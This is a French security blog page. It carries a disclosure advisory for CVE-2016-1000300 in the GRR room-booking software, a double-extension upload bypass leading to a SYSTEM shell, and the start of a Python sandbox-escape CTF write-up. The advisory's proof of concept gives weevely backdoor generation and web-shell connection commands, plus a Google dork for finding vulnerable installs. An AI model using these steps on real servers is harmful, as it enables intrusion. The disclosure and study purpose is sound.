<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/mbr_parser.py" target="_blank">mbr_parser.py</a></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><br /></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="http://www.forensicswiki.org/wiki/Encase_image_file_format" target="_blank">ForensicWiki </a></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><br /></span></span></span></span>
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="http://www.forensicswiki.org/wiki/Libewf" target="_blank">EWF tools</a></span></span></span></span><br />
<span style="color: blue;"><br /></span>
</div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="http://www.cnwrecovery.com/html/e01_and_virtual.html">http://www.cnwrecovery.com/html/e01_and_virtual.html</a></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><br /></span></span></span></span>
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-forensics.html">http://blog.stalkr.net/2010/05/defcon-18-ctf-quals-writeup-forensics.html</a></span></span></span></span></span></div>
<div style="text-align: left;">
<span style="background-color: #3d85c6;"><br /></span>
</div>
<br />
<br />
<div style="text-align: center;">
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">(en souvenir pour les kewpins: sec0d à la remise des prix) </span></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pt5BAOPfqd_25nMUyWS94kVI_wjPHuRKJ9czS7AybL_o_MXWb105VgznKckHsiz623sr-quaNne6IaOPWjesvgUoKLjJhLZoavPcSDdxHwJsYOcOUXW6_XInnBItczHcONYJrupTcN74/s1600/sec0d.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pt5BAOPfqd_25nMUyWS94kVI_wjPHuRKJ9czS7AybL_o_MXWb105VgznKckHsiz623sr-quaNne6IaOPWjesvgUoKLjJhLZoavPcSDdxHwJsYOcOUXW6_XInnBItczHcONYJrupTcN74/s640/sec0d.jpeg" width="640" /></a></div>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<br />
<br />
<br />
<br />
<br />kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-40635530584836540812016-01-17T19:05:00.000+01:002016-12-20T10:06:32.020+01:00[Advisory] CVE-2016-1000300 Vulnérabilité dans GRR <= 3.0.0-RC1 Salut à tous!<br />
<br />
Nouvelle année, nouveaux ponçages et comme j'ai l'impression que nombres de vulns encore présentes ne devraient plus l'être depuis longtemps, je me permet un petit retour sur un de mes récents advisory.<br />
<br />
En effet, il est question ici d'un cas d'école que j'ai eu le plaisir de découvrir récemment sur un outils de réservation de salles... en fait on pourrait se dire "ouai super.. so what!??"<br />
<br />
Mais lorsque cet outil vous permet de pwn une infra lors d'un pentest et de plus est présent sur <b>TOUTES</b> les versions de cette application utilisée par nombre d'institutions notamment FR, je pense qu'il peut être pertinent d'en parler.<br />
<br />
Toutefois et avant de rentrer dans la vuln + l'advisory lui-même <u><span style="color: blue;">je tiens à remercier les personnes maintenant ce projet open source</span></u> avec qui j'ai pu échanger afin de permettre de travailler sur un correctif de sécurité qui sera donc backporté et inclu dans la future version de l'application.<br />
<br />
Vous trouverez les ressources nécéssaires en fin d'article comme d'habitude sur le blog.<br />
<br />
Assez parler place aux détails! :D<br />
<br />
Ici tout d'abord le code vulnérable se trouvant dans le fichier "<b><span style="color: blue;">admin/admin_config1.php</span></b>" du projet <a href="http://grr.devome.com/" target="_blank"><span style="color: blue;">GRR</span></a> ainsi que son lien direct vers pastebin.com:<br />
<br />
<script src="//pastebin.com/embed_js/7Me6zftZ"></script>
<br />
<br />
Bon comme vous pourrez le constater les parties intéréssantes sont déjà commentées expliquant ainsi les grandes lignes de ce qui nous intéresse.<br />
On identifie ici 3 problèmes sur ce code:<br />
<br />
<b>1-</b> On peu bypass le filtre d'upload car ce dernier n'effectue qu'un seul test: l'extension!<br />
Ainsi une double extension (<b><span style="color: red;">backdoor.php.png</span></b>) permet de contourner cela aisément<br />
<br />
<b>2- </b>Ce super script php sorti tout droit des années 90' nous permet de déterminer le noms qu'aura notre backdoor ainsi que son chemin.<br />
En effet, le script va simplement supprimer la seconde extension et comme il effectue un <span style="color: blue;">explode()</span> sur notre fichier afin de récupérer ce qui se situe derrière notre "<span style="color: blue;">.</span>", il va le renommer en "<span style="background-color: white;">l<span style="color: blue;">ogo.php</span></span><span style="color: blue;"><span style="background-color: white;"></span></span>" car le 2ème élément du tableau "<span style="color: blue;">$tab</span>" sera bel et bien notre extension... php ou autre par ailleurs ;-).<br />
<br />
<b>3-</b> Ici c'est la petite touche finale: le fichier sensé être un logo se retrouve "<span style="color: blue;">chmod 666</span>" (RW pour tout le monde) ce qui permet en prime d'obtenir les droits nécéssaires.<br />
<br />
En effet, pour peu que les droits soient bien gérés il serait difficile de faire exécuter ce que l'on souhaite, hors la tout est possible, on peux même grâce à cela obtenir des privilèges largements supérieurs à ceux attendus chose que j'ai pu tester et surtout réussir en gagnant ainsi les droits <b><span style="color: blue;">NT Authority\System</span></b> sur un environnement Microsoft de manière triviale!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ7WR_S6dMjEtenlTwXeEip-nXEEoDCF2aHnpUKK4KhhYuDsK3zpRmxAVC6vU1Kz2gC6zkbkPvfitEo9A0JSF2znBQxV2TsC7l1rKd5Xg-0oieh_TzUCz3ysB9Z8yMk14rVnGdLXCtMKRI/s1600/system_rights.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ7WR_S6dMjEtenlTwXeEip-nXEEoDCF2aHnpUKK4KhhYuDsK3zpRmxAVC6vU1Kz2gC6zkbkPvfitEo9A0JSF2znBQxV2TsC7l1rKd5Xg-0oieh_TzUCz3ysB9Z8yMk14rVnGdLXCtMKRI/s1600/system_rights.png" /></a></div>
<br />
Vous l'aurez compris, c'est assez easy à exploiter sous condition toutefois d'avoir des privilèges au départ afin de pouvoir modifier le logo en question (ce qui m'a été possible via une <b>SQLI</b> sur une application tierce mais qui par ailleurs ne me permettait pas d'obtenir de shell... ce qui fût donc réglé grâce au GRR présent).<br />
<br />
Je vous laisse ici le soin de lire l'advisory en question ainsi que les différents liens concernant ce dernier.<br />
<br />
Ce fût court et assez faiblement technique mais il est vrai que ce genre de vuln existe encore alors autant les étudiers car comem dis en début d'article: ce sont des cas d'écoles que l'on ne devrait même plus trouver hélas!!<br />
<br />
<b>================================================================================================= </b><br />
<div style="text-align: center;">
<b>Public Advisory</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<b>=================================================================================================
</b><b><br /></b><br />
<br />
<u>Title</u>: GRR <= 3.0.0-RC1 (all versions) file upload filter bypass (authenficated) + privilege escalation(in some case)<br />
<br />
<u>Date</u>: January 7th, 2016<br />
<br />
<u>Vendor Homepage</u>: http://grr.devome.com/fr/<br />
<br />
<u>Software Link</u>: <a href="http://grr.devome.com/fr/telechargement/category/3-versions-patch?download=7:grr-3-0-0-rc1" target="_blank">GRR project</a><br />
<br />
<u>Dork</u>: inurl:/grr/ intext:réservation intitle:"GRR"<br />
<br />
<u>CVSS score</u>: <span style="color: red;"><b>9.9</b></span><br />
<u>OVE ID</u>: <span style="color: red;"><b>OVE-20160705-0044</b></span><br />
<u>CVE ID</u>: <span style="color: red;"><b><span class="blob-code-inner">CVE-2016-1000300</span></b></span><br />
<br />
<br />
<b>I. APPLICATION
<br />======================================================================================
<br /> </b><br />
GRR is an open source resources manager tool used in many french public
<br />
institutions (not only!).
<br />
It permit for example to manage rooms reservations, and so much more.
<br />
<br />
<br />
<b>II. ADVISORY
<br />======================================================================================
<br />
</b><br />
<br />
The application allows administrators to change the enterprise's logo
<br />
uploading a new image with .png,.jpg or .gif extension only.
<br />
<br />
Once uploaded, image name is "splitted" in an array and renamed with the
<br />
name "logo" followed by the extention saved as 2nd array's element.
<br />
<br />
This file called for example "logo.jpg" is also "chmoded" as 0666 permission
<br />
and directly accessible in image folder (img_grr by default) by all users.
<br />
<br />
Besides, the application does only a basic conditional php test
<br />
on the extension of the uploaded file.
<br />
<br />
It's possible for an attacker to add a second extension that will be
<br />
used when the image will be renamed in order to bypass this basic filter
<br />
(double extension upload filter bypassing).
<br />
<br />
So, a file called backdoor.php.jpg will be renamed as logo.php with
<br />
chmod 0666 permissions and could be used by attacker to gain more privileges
<br />
on the targeted server (privesc due to bad file permissions and RCE).
<br />
<br />
To trigger this vulnerability it is necessary to have an administrator
<br />
account on the GRR application.
<br />
<br />
This vulnerability is a combination of 3 issues:
<br />
<ol>
<li>- predictable uploaded file names and path
</li>
<li>- upload of any kind of file
</li>
<li style="text-align: left;">- bad files permission when we upload this file that permit us to gain privilegied access.
</li>
</ol>
<br />
Note that it could be "dorkable" in order to find targets ... and sometimes
<br />
with trivial admin credentials ;-).
<br />
<br />
<b>
<br />III. PROOF OF CONCEPT
<br />======================================================================================
<br />
</b><br />
Generate backdoor:
<br />
<i><br /> kmkz@Tapz:~# weevely generate pass123 /tmp/3lrvs.php
<br /> Generated backdoor with password 'pass123' in '/tmp/3lrvs.php' of 1486 byte size.
<br /> kmkz@Tapz:~# mv /tmp/3lrvs.php /tmp/3lrvs.php.jpg
</i><br />
<br />
<br />
Login as admin and upload this new 'logo' > Administration > logo
<br />
<br />
Enjoy your shell!
<br />
<br />
<i> kmkz@Tapz:~# weevely http://laboratoire.target.fr/images/logo.php pass123
<br /> [+] weevely 3.2.0
<br />
<br /> [+] Target: laboratoire.target.fr:F:\server\grr\images
<br /> [+] Session: /kmkz/.weevely/sessions/laboratoire.target.fr/logo_1.session
<br /> [+] Shell: System shell
</i><br />
<br />
<i>[+] Browse the filesystem or execute commands starts the connection
<br /> [+] to the target. Type :help for more information.
<br />
<br /> weevely> whoami
<br /> autorite nt\system
</i><br />
<br />
<br />
<br />
<b>IV. RISK
<br />======================================================================================
<br /> </b><br />
By uploading a script, an attacker may be able to execute arbitrary code
<br />
on the server with elevated privileges.
<br />
<br />
This flaw may compromise the integrity of the system
<br />
(with access to sensitive informations, network shares...) and it may conduce
<br />
to full information system's compromission using pivots techniques and imagination!
<br />
<br />
<br />
<b>V. VERSIONS AFFECTED
<br />======================================================================================
<br /> </b><br />
GRR 3.0.0-RC1 is vulnerable (and all previous versions)
<br />
<br />
<br />
<b>VI. TIMELINE
<br />======================================================================================
<br /> </b><br />
December 17th, 2015: Vulnerability identification
<br />
January 7th, 2016: Vendor and project developers notification
<br />
January 11th, 2016: Project developers response
<br />
January 15th, 2016: Patch release
<br />
January 17th, 2016: Public disclosure
<br />
<br />
<b>======================================================================================
</b><br />
<a href="https://github.com/JeromeDevome/GRR/blob/master/admin/admin_config1.php" target="_blank"><br /></a>
<br />
<a href="https://github.com/JeromeDevome/GRR/blob/master/admin/admin_config1.php" target="_blank">Projet GRR</a><br />
<br />
<a href="https://github.com/JeromeDevome/GRR/blob/master/admin/admin_config1.php" target="_blank">Git Hub du projet contenant le fix </a><br />
<br />
<a href="http://www.kaizendo.fr/php-how-to-manage-uploaded-image-in-secure-way/" target="_blank">Publication de Nicolas Bouteiller (contributeur/dev de la prochaine version GRR)</a><br />
<br />
So now, update your GRR install ;-)<br />
<br />
A bientôt pour de nouvelles aventures !!! <br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="de1">
</div>
kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-12182402673335697032014-11-15T20:58:00.000+01:002014-11-15T23:25:54.795+01:00Python sandbox escape: sortez du bac à sable !Salut tout le monde!<br />
<br />
De passage sur mon blog pour un nouveau papier concernant quelque chose sur lequel je serais emmené à travailler bien plus en profondeur: <u>l'évasion de sandbox</u> !<br />
<br />
Pour ceux qui ne comprendraient pas le fait de jouer dans des bacs à sable python, je vous remmène à l'actualité de la semaine passé avec une <b>MAGNIFIQUE</b> publication de l'équpe de chez G-DATA (salut à <b>RootBSD</b> au passage!) sur <b>Cuckoo</b> qui travaille lui-même sur une base sandbox en Python (vulnérabilité corrigée dans la foulée sur la version 1.1.1) et la possibilité pour un code malveillant d'en sortir via une variable "<span style="color: blue;">buf</span>" mal 'sanitized' comme ceci:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdkQfaM56XCmQl6Vly1kS3nEu5WaqxgsxYOV7RKAcHwIfUeRtak92QdJob-BIT9lbgxhXxHntFQ5R1fdvyP15RSQV2_hkVFLpmuSE-VQZsV6AWNOVRHw46MeZs3Kg4Ich5aFBbvKnOJyb/s1600/cuckoo_escape.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdkQfaM56XCmQl6Vly1kS3nEu5WaqxgsxYOV7RKAcHwIfUeRtak92QdJob-BIT9lbgxhXxHntFQ5R1fdvyP15RSQV2_hkVFLpmuSE-VQZsV6AWNOVRHw46MeZs3Kg4Ich5aFBbvKnOJyb/s1600/cuckoo_escape.png" height="107" width="400" /></a></div>
<br />
Link vers la publication <a href="http://cuckoosandbox.org/2014-10-07-cuckoo-sandbox-111.html" target="_blank">ici</a> et vers le POC de <b>G-DATA</b> <a href="https://blog.gdatasoftware.com/blog/article/cuckoo-sandbox-evasion-poc-available.html" target="_blank">ici</a> .<br />
<br />
Bon .. le contexte étant dessiné, passons maintenant à l'article lui-même!<br />
Première chose: avoir une <b>sandbox</b> a pwnd sans quoi on n'irait pas bien loin... j'ai donc cherché sur le net et en ai trouvé 2 sympa.<br />
<br />
Ceci dis je n'en aurai retenu qu'une, l'autre m'ayant déjà amusé par le passé et donc voulant aussi m'amuser un peu je me suis dis que celle ci serait plus "fun" à exploiter!<br />
<br />
Il s'agit d'un ancien challenge du CTF de la Hack.lu de 2012 (liens en fin d'article) mais qui, pour un débutant comme moi dans le domaine, n'a pas pris une ride alors ... allons-y !<br />
<br />
Voici la source de cette <b>sandbox</b>:<br />
<br />
<ol style="background-color: #f8f8f8; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">#!/usr/bin/python</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">def</span> make_secure<span class="br0">(</span><span class="br0">)</span>:</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
UNSAFE <span class="sy0" style="color: #66cc66;">=</span> <span class="br0">[</span><span class="st0" style="color: darkslateblue;">'open'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'file'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'execfile'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'compile'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'reload'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'__import__'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: darkslateblue;">'eval'</span><span class="sy0" style="color: #66cc66;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span style="color: black;"> </span><span style="color: darkslateblue;">'locals'</span><span style="color: #66cc66;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;">
<blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;">
<span class="st0" style="color: darkslateblue;"> 'input'</span><span class="br0">]</span></blockquote>
</blockquote>
</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">for</span> func <span class="kw1" style="color: #ff7700; font-weight: bold;">in</span> UNSAFE:</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">del</span> __builtins__.<span class="kw4" style="color: mediumblue;">__dict__</span><span class="br0">[</span>func<span class="br0">]</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">from</span> <span class="kw3" style="color: crimson;">re</span> <span class="kw1" style="color: #ff7700; font-weight: bold;">import</span> findall</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;"># Suppression de la liste des builtins dangeureux:</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
make_secure<span class="br0">(</span><span class="br0">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">print</span> <span class="st0" style="color: darkslateblue;">'Go Ahead, Expoit me >;D'</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;"><br /></span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">while</span> <span class="kw2" style="color: green;">True</span>:</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">try</span>:</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;"># Lis l entree utilisateur jusqu au premier caractere vide (espace):</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
inp <span class="sy0" style="color: #66cc66;">=</span> findall<span class="br0">(</span><span class="st0" style="color: darkslateblue;">'<span class="es0" style="color: #000099; font-weight: bold;">\S</span>+'</span><span class="sy0" style="color: #66cc66;">,</span> <span class="kw2" style="color: green;">raw_input</span><span class="br0">(</span><span class="br0">)</span><span class="br0">)</span><span class="br0">[</span><span class="nu0" style="color: orangered;">0</span><span class="br0">]</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
a <span class="sy0" style="color: #66cc66;">=</span> <span class="kw2" style="color: green;">None</span></div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span style="color: grey; font-style: italic;"> # Attribue a la variable l output de l execution:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">exec</span> <span class="st0" style="color: darkslateblue;">'a='</span> + inp</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">print</span> <span class="st0" style="color: darkslateblue;">'Return Value:'</span><span class="sy0" style="color: #66cc66;">,</span> a</div>
</li>
<li class="li1" style="-webkit-user-select: none; color: #acacac;"><div class="de1" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">except</span> <span class="kw2" style="color: green;">Exception</span><span class="sy0" style="color: #66cc66;">,</span> e:</div>
</li>
<li class="li2" style="-webkit-user-select: none; color: #acacac;"><div class="de2" style="-webkit-user-select: text; background: rgb(255, 255, 255); border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #ff7700; font-weight: bold;">print</span> <span class="st0" style="color: darkslateblue;">'Exception:'</span><span class="sy0" style="color: #66cc66;">,</span> e</div>
</li>
</ol>
<br />
<br />
(Rappelons qu'ici l'objectif sera de lire un fichier nommé "<b>FileToRead</b>" et placé dans le répertoire courant.)<br />
<br />
Tout d'abord que voyons nous?<br />
On remarque vite qu'une fonction est appelée afin de nous empêcher d'accéder à certains <span style="color: blue;">__builtins__()</span> qui sont, pour rappel, des fonctions prédéfinies de Python.<br />
<br />
Dommage, pas de <span style="color: blue;">eval()</span>, pas de possibilité d'appeler<span style="color: blue;"> __import__()</span> ni<span style="color: blue;"> open()</span> enfin bref que du bonheur !<br />
A présent j'ai deux approche en tête mais ne vais me consacrer qu'à une qui m'a particulièrement plûe et que je vais donc dérouler à présent.<br />
<br />
ne pouvant me reposer sur mes <span style="color: blue;">__builtins__()</span> préférés, je vais commencer par rapidement faire une évaluation des possibilités qui s'offrent tout de même à moi et après quelques tests (certains visible dans le screenshot suivant) me voila arrivé à ceci:<br />
<br />
<br />
